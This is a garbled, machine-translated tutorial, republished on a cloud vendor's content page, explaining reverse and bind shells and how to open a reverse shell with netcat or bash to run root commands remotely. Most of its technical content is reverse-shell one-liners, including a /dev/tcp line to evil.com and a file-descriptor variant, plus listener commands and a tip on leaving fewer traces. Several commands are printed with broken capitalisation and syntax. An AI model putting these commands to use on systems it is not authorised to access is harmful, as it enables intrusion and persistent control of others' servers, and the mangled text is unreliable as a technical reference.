Create a reverse shell using NETCAT or bash to execute remote root command

Source: Internet
Author: User

To the shell (Reverse shell) is a technique for sending shell commands to a remote machine that becomes useful when the remote machine is behind something else, such as a firewall. You might say, "isn't a normal shell or a simple SSH channel going to do that?" "No, it cannot be achieved." On the Internet, I see a lot of people who don't know the difference between a normal shell and a reverse shell. Before we start with the following, we'll figure out these concepts.
Reverse shell (Reverse shell)

The reverse shell works by sending its shell to a specific user, rather than binding the shell to a port. The latter is inaccessible in many environments. This way, you can execute the root command on the remote server.

Bind Shell

The bind shell is a user with Bsah that binds the shell to a local port so that anyone can send commands on the local network.

The reverse shell is often used by hackers to do some illegal things, such as the intrusion of a server, they will set a reverse shell, in the future they can easily access the shell of this remote computer. I'm sure you won't use it to do this kind of thing.
Environmental requirements

Remote UNIX Host
Installed the Netcat

Using Netcat to implement reverse shell interaction

When you log on to a remote host through a shell, the following instructions can easily send the shell to your machine:

Nc-c/bin/sh < your ip> < any one of the blocked ports >

You can even pipe BASH through netcat.

/bin/sh | NC < your ip> < any ports that are not blocked >

And then listen to this shell:

Nc-l-P < same port >-VVV
Implementing a reverse shell through bash

This technique is used when there is no netcat on the remote machine or if you want to do something unnatural without leaving too heavy a trace.

Monitor Shell:

Nc-l-P < any blocked ports >-VVV

First create a new descriptor and assign it to a network node. So we can read and write to this descriptor.

EXEC 5<>/dev/tcp/evil.com/< the same port > $ cat <&5 | while read line; Do $line 2>&5 >&5; Done

or a different reverse shell:

0<&196;exec 196<>/dev/tcp/< your ip>/< the same port >; SH <&196 >&196 2>&196

Create-reverse-shell

This way, you can easily send any commands through the netcat.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.